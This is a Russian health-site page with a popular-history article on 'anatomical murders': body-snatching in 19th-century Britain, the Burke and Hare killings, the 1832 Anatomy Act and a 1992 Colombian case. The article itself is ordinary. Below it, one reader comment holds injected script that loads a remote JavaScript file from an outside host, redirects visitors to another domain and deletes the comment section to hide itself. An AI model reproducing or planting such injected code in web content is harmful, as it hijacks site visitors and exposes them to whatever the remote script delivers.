Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Убить за науку  >>  Убить за науку
 
Обратная связь
 

Убить за науку

Размер шрифта
31 июля 2011 07:00
  • google_analytics: false
  • Нравится

Английский философ Генри Олдрич в XVII веке написал эпиграмму о причинах пьянства, которых в восьми строках произведения он насчитал почти два десятка. Если бы веселому философу пришло в голову написать продолжение, к примеру, о причинах убийств, то восьми строк ему бы точно не хватило. Люди лишают друг друга жизни по самым экзотичным поводам: из-за политических разногласий, из ревности, из жадности, по долгу службы и по тысячам иных причин. Однако кое-что человечество навсегда оставило в прошлом. Речь сегодня пойдет об анатомических убийствах – давно уже позабытой разновидности преступлений.

Евгений Бузев / «Здоровье инфо»

Цена врачебной ошибки

В Средние века профессия врача была сопряжена с немалым риском. Религиозное общество косо смотрело на тех, кто пытался вмешиваться в вотчину Бога, то есть здоровье человека. Угодить на костер за врачебную деятельность было несложно, иногда такая судьба постигала даже выдающихся медиков того времени. Например, так закончил свою жизнь врач Мигель Сервет, который первым описал малый круг кровообращения.

Впрочем, в наше время средневековым врачам тоже были бы не рады: тогдашняя медицина мало отличалась от знахарства. Недостаток знаний компенсировали сомнительными средствами и заговорами, что вполне могло квалифицироваться как колдовство со всеми вытекающими последствиями. Трагическая судьба ждала врачей, если в результате их действий умирал пациент. Однако с приходом Нового времени, врачей на костер отправляли все реже, а медицина начала превращаться из вольной профессии в науку.

Похитители тел

Развитие медицины, особенно анатомии, споткнулось тогда об остатки былых религиозных норм. Получать знания о строении человеческого организма будущим врачам было непросто. А религия выступала против эксгумации тел и уж тем более против их хирургического исследования. Всем тем, кто хотел выучиться на медика, приходилось выбирать один из двух путей. Или учиться по медицинским, часто неполным атласам, составленным давно, без учета новейших знаний. Или же идти на преступление.

В начале XIX века ведущим государством мира была Британская империя. Она была мировым лидером практически во всех областях политики, культуры, экономики и науки. А после Наполеоновских войн началась повальная мода на врачебное образование, и по всей Британии открывались все новые учебные заведения. Однако английские анатомы имели право на хирургическое вскрытие только в двух случаях: если покойник был приговорен к смертной казни за тяжкое преступление, и если вскрытие проводилось в судебном порядке. Естественно, число таких легальных «пособий» было ничтожно мало по сравнению с потребностями молодой науки.

Неудивительно, что распространение получила практика нелегального похищения мертвецов из могил. В те годы резко выросло число кладбищенских сторожей. Раньше охранять приходилось только богатые могилы, в которых вместе с покойником хоронили материальные свидетельства его достатка.

Развитие же анатомии поставило под угрозу всех покойников. Неотъемлемой частью гроба стали в то же время железные замки, хитрые засовы и другие способы воспрепятствовать похищению тела безвременно усопшего родственника жадными до знаний студентами. Впрочем, сами студенты на такой шаг шли редко. Обычно украденные тела покупались у «специалистов» – квалифицированных похитителей тел.

Интересно, что при разграблении могил, охотники за телами старались ни в коем случае не взять ничего лишнего. Дело в том, что «простое» похищение трупа наказывалось штрафом и тюрьмой, а похищение «с отягощающими» (то есть вместе с захороненным имуществом) – высылкой в Австралию, которая в XIX представляла собой совсем не райский уголок.

Новые веяния

Вместе с развитием науки развивалась и экономика. В свои права вступал капитализм, и все больше людей понимали, что прибыль можно получить из любого запроса на рынке. Если учесть, что анатомам требовались как можно более свежие тела, то неудивительно, что спрос с предложением в конце концов встретились.

Нелегальная эксгумация не дает гарантий свежести анатомического материала. По разным причинам тела могут разлагаться очень быстро, да и выбирать на ночном охраняемом кладбище не так уж и просто. Следовательно, рассудили два шотландских авантюриста Берк и Хейр, процесс должен быть контролируемым.

Контролировать процесс оказалось просто. Жена Хейра содержала ночлежку, в которой нередко останавливались пожилые и одинокие люди. Для двенадцати постояльцев этот ночлежный дом стал последним пристанищем в жизни. Берк и Хейр попросту душили своих постояльцев, а тела продавали частному преподавателю анатомии. Конец настал, когда очередная постоялица нашла тело своей предшественницы под кроватью и немедленно обратилась в полицию. Берк был повешен, а Хейр отпущен за сотрудничество со следствием. Интересно, что английский термин burking (удушение через сдавливание груди) происходит от фамилии Берка.

Такое развитие событий навело на соответствующие мысли и других любителей легкой наживы. Всего через несколько лет в Лондоне была арестована банда бывших мясников, которые пошли по стопам Берка и Хейра и пытались продать в Королевский анатомический колледж тело убитого ими ребенка.

Последствия

Череда анатомических убийств и привела к тому, что Великобритания стала первым в Западной Европе государством, в котором был юридически отрегулирован процесс использования тел умерших людей для хирургического вскрытия в медицинских учебных заведениях. В 1832 году английский парламент принял «Анатомический акт». Согласно этому закону врачи имели право легально договариваться с родственниками покойного о возможности вскрытия его тела, а также препарировать тех, кто завещал себя науке. Так «анатомические убийства» и стали достоянием прошлого. Правда, на тот момент только в Британии.

Процесс легализации патологоанатомами продолжался в мире на протяжении всего XIX и части ХХ века, что получило отражение в книгах и фильмах. Можно вспомнить, например, сцену из «Приключений Тома Сойера», где Том и его друзья становятся свидетелями нелегальной эксгумации трупа. А последние анатомические убийства были зафиксированы в Колумбии, по историческим меркам совсем недавно. В 1992 году 14 бедняков были убиты с целью продажи их тел в местную медицинскую школу.

Кстати, в России эта проблема всерьез не стояла с начала XVIII века, после легализации и пропаганды патологоанатомических исследований. А первым анатомическим театром в нашей стране была знаменитая Кунсткамера.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.